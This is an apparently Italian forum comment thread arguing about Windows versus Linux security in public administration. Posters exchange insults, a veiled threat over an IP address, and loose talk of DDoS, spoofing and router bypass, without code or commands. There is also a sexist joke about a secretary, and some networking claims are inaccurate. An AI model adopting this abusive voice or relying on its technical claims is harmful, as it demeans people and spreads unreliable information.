            Re: IL male è in Winzozz
            - Scritto da: Anonimo

            - Scritto da: Anonimo

            Ecco un lamer.

            ecco una merdaEcco un lamer di me**a. Torna a bucare lamerozzolo, con la speranza che non ti bustino prima o poi.
          • Anonimo scrive:
            Re: IL male è in Winzozz
            - Scritto da: Anonimo
            Ecco un lamer di me**a. Torna a bucare
            lamerozzolo, con la speranza che non ti bustino
            prima o poi.Fratello ho tutte le precauzioni del caso a cominciare dall'indirizzo IP della tua linea ADSLyeahhh :D .
          • Anonimo scrive:
            Re: IL male è in Winzozz
            - Scritto da: Anonimo

            - Scritto da: Anonimo

            Ecco un lamer di me**a. Torna a bucare

            lamerozzolo, con la speranza che non ti bustino

            prima o poi.

            Fratello ho tutte le precauzioni del caso a
            cominciare dall'indirizzo IP della tua linea ADSL
            yeahhh :D .Voglio proprio vedere cosa ci fai con il mio indirizzo IP, visto che non ho nessun servizio in ascolto. Vabbè essendo un lamer puoi sempre scagliarmi un DDOS. Ma non lo fare ti scongiuro.
          • Anonimo scrive:
            Re: IL male è in Winzozz
            - Scritto da: Anonimo


            - Scritto da: Anonimo



            - Scritto da: Anonimo


            Ecco un lamer di me**a. Torna a bucare


            lamerozzolo, con la speranza che non ti
            bustino


            prima o poi.



            Fratello ho tutte le precauzioni del caso a

            cominciare dall'indirizzo IP della tua linea
            ADSL

            yeahhh :D .

            Voglio proprio vedere cosa ci fai con il mio
            indirizzo IP, visto che non ho nessun servizio in
            ascolto.
            Vabbè essendo un lamer puoi sempre scagliarmi un
            DDOS. Ma non lo fare ti scongiuro.
            Mai sentito parlare di spoofing?Diciamo che può provare a fare qualche porcheria in giro per la rete a "nome" tuo.
          • Anonimo scrive:
            Re: IL male è in Winzozz
            - Scritto da: Anonimo
            Mai sentito parlare di spoofing?E come ha spoofato, che magari è collegato a internet tramite modem? Non diciamo cavolate.
          • Anonimo scrive:
            Re: IL male è in Winzozz
            - Scritto da: Anonimo

            - Scritto da: Anonimo





            - Scritto da: Anonimo





            - Scritto da: Anonimo



            Ecco un lamer di me**a. Torna a bucare



            lamerozzolo, con la speranza che non ti

            bustino



            prima o poi.





            Fratello ho tutte le precauzioni del caso a


            cominciare dall'indirizzo IP della tua linea

            ADSL


            yeahhh :D .



            Voglio proprio vedere cosa ci fai con il mio

            indirizzo IP, visto che non ho nessun servizio
            in

            ascolto.

            Vabbè essendo un lamer puoi sempre scagliarmi un

            DDOS. Ma non lo fare ti scongiuro.



            Mai sentito parlare di spoofing?
            Diciamo che può provare a fare qualche porcheria
            in giro per la rete a "nome" tuo.Qua dimostri tutta la tua ignoranza in materia. Ammesso che tu conosca il mio IP, mi dici come credi di fare a fare spoofing e che tecnica utilizzi? Da quello che sò dovresti cominciare ad indovinare l' ISN (initial sequence number) durante il 3-way handshaking . Voglio proprio vedere come lo indovini con una probabilità di 1/2^32. Torna a dormire lamer che domani devi andare a scuola.
          • Anonimo scrive:
            Re: IL male è in Winzozz
            - Scritto da: Anonimo
            credi di fare a fare spoofing e che tecnica
            utilizzi? Da quello che sò dovresti cominciare ad
            indovinare l' ISN (initial sequence number)
            durante il 3-way handshaking . Voglio proprio
            vedere come lo indovini con una probabilità di
            1/2^32. Torna a dormire lamer che domani devi
            andare a scuola.Tesoro che ne dici se baipasso il catalyst e ti faccio uscire con una classe di indirizzi su di un'altro router ?Lo sai che si puo fare vero ....
          • zirgo scrive:
            Re: IL male è in Winzozz
            www.accademiadellacrusca.itCosa mi tocca leggere...UN'ALTRO...dov'è la cultura tanto sbandierata da internet se poi si continuano a fare certi errori grossolani da scuola elementare? :(Che tristezza...
          • Anonimo scrive:
            9 --
          • Anonimo scrive:
            Re: IL male è in Winzozz
            - Scritto da: Anonimo

            - Scritto da: Anonimo

            credi di fare a fare spoofing e che tecnica

            utilizzi? Da quello che sò dovresti cominciare
            ad

            indovinare l' ISN (initial sequence number)

            durante il 3-way handshaking . Voglio proprio

            vedere come lo indovini con una probabilità di

            1/2^32. Torna a dormire lamer che domani devi

            andare a scuola.

            Tesoro che ne dici se baipasso il catalyst e ti
            faccio uscire con una classe di indirizzi su di
            un'altro router ?
            Lo sai che si puo fare vero ....Si può fare se hai un accesso diretto all'interfaccia di management del router, ma dubito che tale interfaccia sia raggiungibile tramite internet. Poi credo che a malapena tu non sappia neanche di cosa parli. Adesso è proprio ora di andare a dormire caro il mio lamerozzo. Torna a studiare sux0r.
          • Anonimo scrive:
            Re: IL male è in Winzozz
            - Scritto da: Anonimo

            Tesoro che ne dici se baipasso il catalyst e ti
            faccio uscire con una classe di indirizzi su di
            un'altro router ?
            Lo sai che si puo fare vero ....Vediamo di capire che stai dicendo:Per effettuare un ip spoofing devi trovarti sullo stesso segmento di rete della macchina che vuoi impersonare, vale a dire nello stesso dominio di brodcast ethernet, sempre che non sia switchato (arp poisoning permettendo). Quindi la possibilita' che tu possa fare spoofing di una macchina connessa via adsl ad un isp non riesco a vederla. Che catalyst vorresti bypassare? Ma sopratutto che catalyt vai dicendo?hola
          • Anonimo scrive:
            Re: IL male è in Winzozz
            - Scritto da: Anonimo
            Ma non dire vaccate per favore.certo certo continua pure a basare le tue conoscienze su qualche ezine axor dove imparitutto quello che cè da sapere sugli exploit buffer overflow spoofing e cazzate varie.mi raccomando non togliere lo sguardo da queste freegnacce senno dopo come fai a orientarti sulla vera complessita di un sistema informatico con attrezzature per uso militare...il tizio che ha scritto dei pop sa delle cose vere(qualcuno della polpost gli ha messo la pulce nell'orecchio ma nulla di più ) ciao fratello vai a giocare con gli Arp poisoning :D .
          • Anonimo scrive:
            Re: IL male è in Winzozz
            - Scritto da: Anonimo

            - Scritto da: Anonimo

            Ma non dire vaccate per favore.

            certo certo continua pure a basare le tue
            conoscienze su qualche ezine axor dove impari
            tutto quello che cè da sapere sugli exploit
            buffer overflow spoofing e cazzate varie.
            mi raccomando non togliere lo sguardo da queste
            freegnacce senno dopo come fai a orientarti sulla
            vera complessita di un sistema informatico con
            attrezzature per uso militare...
            il tizio che ha scritto dei pop sa delle cose vere
            (qualcuno della polpost gli ha messo la pulce
            nell'orecchio ma nulla di più )
            ciao fratello vai a giocare con gli Arp poisoning
            :D .Sei il solito lamerozzo. La realtà è che ammesso sia vero cià che hai detto, una volta conensso sul numer gsm , quanto meno devi autenticarti per poter compiere certe operazioni. E certamente q uelli di telecom non sono così stupidi da lasciare password di default (sempre che ne esistano ).Torna a giocare alla playstation lamer.
    • Anonimo scrive:
      Re: IL male è in Winzozz
      - Scritto da: Anonimo
      E' lui il responsabile di tutto ciò. Le PA
      farebbero bene ad emigrare a piattaforme più
      sicure come Linux, e abbondonare quella ciofeca
      di Wincess. Virus, patch in ritardo e zombie che
      si diffondono a macchia d'olio, a chi vogliamo
      imputare almeno il 90% delle responsabilità?ma ci credi veramente?linux è un sistema che fa fatica a competere con windows XP, un OS stravecchio, in cosa sarebbe migliore? Non prende i virus? Per forza, ci sono talmente pochi programmi sotto linux che non riescono neanche a trovare un compilatore che vada bene.
      • Anonimo scrive:
        Re: IL male è in Winzozz
        - Scritto da: Anonimo

        - Scritto da: Anonimo

        E' lui il responsabile di tutto ciò. Le PA

        farebbero bene ad emigrare a piattaforme più

        sicure come Linux, e abbondonare quella ciofeca

        di Wincess. Virus, patch in ritardo e zombie che

        si diffondono a macchia d'olio, a chi vogliamo

        imputare almeno il 90% delle responsabilità?
        ma ci credi veramente?
        linux è un sistema che fa fatica a competere con
        windows XP, un OS stravecchio, in cosa sarebbe
        migliore?
        Non prende i virus? Per forza, ci sono talmente
        pochi programmi sotto linux che non riescono
        neanche a trovare un compilatore che vada bene.Ecco la vera ignoranza dove sta, fa fatica a competere? E ti sei mai chiesto perchè? Certo se te lo ritrovi preinstallato sul 99,99% dei pc sul mercato, grazie alle politche scorrette ed aggressive di microsux, ci credo che fa "fatica" ad emergere. Nonostante ciò la comunità sta sempre diventando più folta e con gli anni i seguaci del pinguino crescono. Molte PA straniere come in germania hanno addirittura migrato a Linux, e questo dovrebbe già farti riflettere un pò.
        • Anonimo scrive:
          Re: IL male è in Winzozz
          - Scritto da: Anonimo
          e questo dovrebbe già farti riflettere un pò.per farlo riflettere dovrebbe avere un cervello ...
          • Anonimo scrive:
            Re: IL male è in Winzozz
            - Scritto da: Anonimo

            - Scritto da: Anonimo

            e questo dovrebbe già farti riflettere un pò.

            per farlo riflettere dovrebbe avere un cervello
            ...Forse ce l'ha, ma IE e' crashato e ha cominciato a dire buffonate ;)
          • Anonimo scrive:
            Re: IL male è in Winzozz
            il problema e' la segretaria soppra ai 40 che se gli dici usa firefox ti guarda come che cazzo vuole sto qui mi scombussola la vita.voglio linux che identico a XP con tanto di gui del cazzo(tanto la shell non serve, basta openoffice, pero si deve aprire in fretta), non esiste un exchange (e' un cesso)
          • pikappa scrive:
            Re: IL male è in Winzozz
            - Scritto da: Anonimo
            il problema e' la segretaria soppra ai 40 che se
            gli dici usa firefox ti guarda come che cazzo
            vuole sto qui mi scombussola la vita.La segretaria si attacca al tram e impara come tutti gli altri, anche su windows, perchè l'icona di IE gliela levo :-P
          • Anonimo scrive:
            Re: IL male è in Winzozz
            - Scritto da: pikappa

            - Scritto da: Anonimo

            il problema e' la segretaria soppra ai 40 che se

            gli dici usa firefox ti guarda come che cazzo

            vuole sto qui mi scombussola la vita.
            La segretaria si attacca al tram e impara come
            tutti gli altri, anche su windows, perchè l'icona
            di IE gliela levo :-PE poi si mette sotto la scrivania a lavorare...a cosa le serve una postazione?!
        • Anonimo scrive:
          Re: IL male è in Winzozz

          Molte PA straniere come in germania hanno
          addirittura migrato a Linux, e questo dovrebbe già
          farti riflettere un pò.A me farebbe piu' riflettere una grossa azienda che passa da windows a Linux, piuttosto che una PA. Le PA per me non contano niente. Sono il massimodell'ignoranza informatica. E poi bisogna vedere quantodurano le migrazioni. Anche il comune della citta' in cuiabito migro' ad Openoffice. Dopo 6 mesi, e' ritornato ad Office. La gente si lamentava...
      • Anonimo scrive:
        Re: IL male è in Winzozz
        -
        ma ci credi veramente?
        linux è un sistema che fa fatica a competere con
        windows XP, un OS stravecchio, in cosa sarebbe
        migliore?
        Non prende i virus? Per forza, ci sono talmente
        pochi programmi sotto linux che non riescono
        neanche a trovare un compilatore che vada bene.Non entro nel merito della disponibilita' di applicazioni per linux, che peraltro non capisco cosa abbia a che fare con la sicurezza, mi limito a sottolineare che virus per linux esistono, ma tendenzialmente le politiche di default adottate sui sistemi unix li rendono molto meno pericolosi rispetto a quelli per windows. Se un exploit permette di scalare i permessi fino a root il sistema viene compromesso in linux come in windows, ma normalmente uno user linux se avvia un virus per "errore" non si ritrova la macchina compromessa come invece avviene "tipicamente" per uno user windows. hola
    • Hotge scrive:
      Re: IL male è in Winzozz
      (troll) (troll1) (troll2) (troll3) (troll4)
    • Anonimo scrive:
      Re: IL male è in Winzozz
      Le PA farebbero meglio a diffondere un po' di cultura informatica. I S.O. non c'entrano: sono tutti più o meno bucati/bucabili. Certo che se l'utente scarica (anche per sbaglio) un file da internet, e alla domanda "Devo eseguirlo ?" risponde sistematicamente SI', beh allora...
      • Anonimo scrive:
        Re: IL male è in Winzozz
        - Scritto da: Anonimo
        Le PA farebbero meglio a diffondere un po' di
        cultura informatica. I S.O. non c'entrano: sono
        tutti più o meno bucati/bucabili. Certo che se
        l'utente scarica (anche per sbaglio) un file da
        internet, e alla domanda "Devo eseguirlo ?"
        risponde sistematicamente SI', beh allora...Bhe, la differenza e' che su windows a causa delle dll e dei permessi di system usati dal 80% dei processi che girano e' facile scalare i diritti; con linux molto meno.Se vuoi dimostrarmi il contrario liberissimo, scrivimi uno script o un eseguibile, io lo scarico, mi creo un'utente in piu' e lo eseguo, vediamo che riesce a fare.
  • Anonimo scrive:
    roba da pazzi !!
    Avrei proprio voglio di "spiegarvi" tutto dell'SPC, di EDS, di come si è proceduti nel progetto di una serie di follie tutte italiane che prima si chiamavano RUPA, RIPA (quando eravamo presuntuosi), ora SPC perchè bisognava fare una torta più GRANDE.Non voglio commentare l'articolo....è meglio lasciar perdere.
    • Anonimo scrive:
      Re: roba da pazzi !!
      commenta commenta ... perche' no ... sentire l'opinione comunque aiuta a capire come si e' arrivati dove siamo ora , o no?? ;-)
    • Anonimo scrive:
      Re: roba da pazzi !!
      Vai avanti a parlare ad acronimi che non si capisce una minchia...
    • Anonimo scrive:
      Re: roba da pazzi !!
      - Scritto da: Anonimo
      Avrei proprio voglio di "spiegarvi" tutto
      dell'SPC, di EDS, di come si è proceduti nel
      progetto di una serie di follie tutte italiane
      che prima si chiamavano RUPA, RIPA (quando
      eravamo presuntuosi), ora SPC perchè bisognava
      fare una torta più GRANDE.

      Non voglio commentare l'articolo....è meglio
      lasciar perdere.La RIPA, Rete Internazionale Pubblica Amministrazione...è viva, vegeta ed in pieno sviluppo!
Chiudi i commenti